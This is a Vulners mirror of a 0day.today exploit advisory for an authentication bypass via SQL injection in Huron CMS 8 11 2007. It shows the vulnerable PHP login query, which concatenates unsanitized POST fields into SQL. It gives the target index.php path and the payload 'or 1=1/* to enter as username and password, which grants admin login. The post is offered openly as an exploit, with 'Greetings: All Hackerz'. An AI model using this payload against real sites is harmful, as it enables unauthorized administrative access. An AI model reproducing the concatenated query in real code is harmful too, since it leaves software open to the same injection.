Lucene search
K

Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability

🗓️ 30 Mar 2010 00:00:00Reported by MatType 
zdt
 zdt
🔗 0day.today👁 26 Views

Huron CMS 8 11 2007 SQL Injection Vulnerabilit

Code
=============================================================
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
=============================================================

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip
Author: mat
Mail: [email protected]
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
 
//------------------------------------------------------------------+
<?
    $consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'";
    $resultado=mysql_query($consulta,$link);
    $i=0;
    while($row = mysql_fetch_array($resultado))
    {
        $i++;
    }
    if($i>0){
?>
//------------------------------------------------------------------+
 
http://[target]/[path]/index.php
 
Put as username and password: 'or 1=1/*
You will log in as admin
 
Greetings: All Hackerz



#  0day.today [2018-04-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
26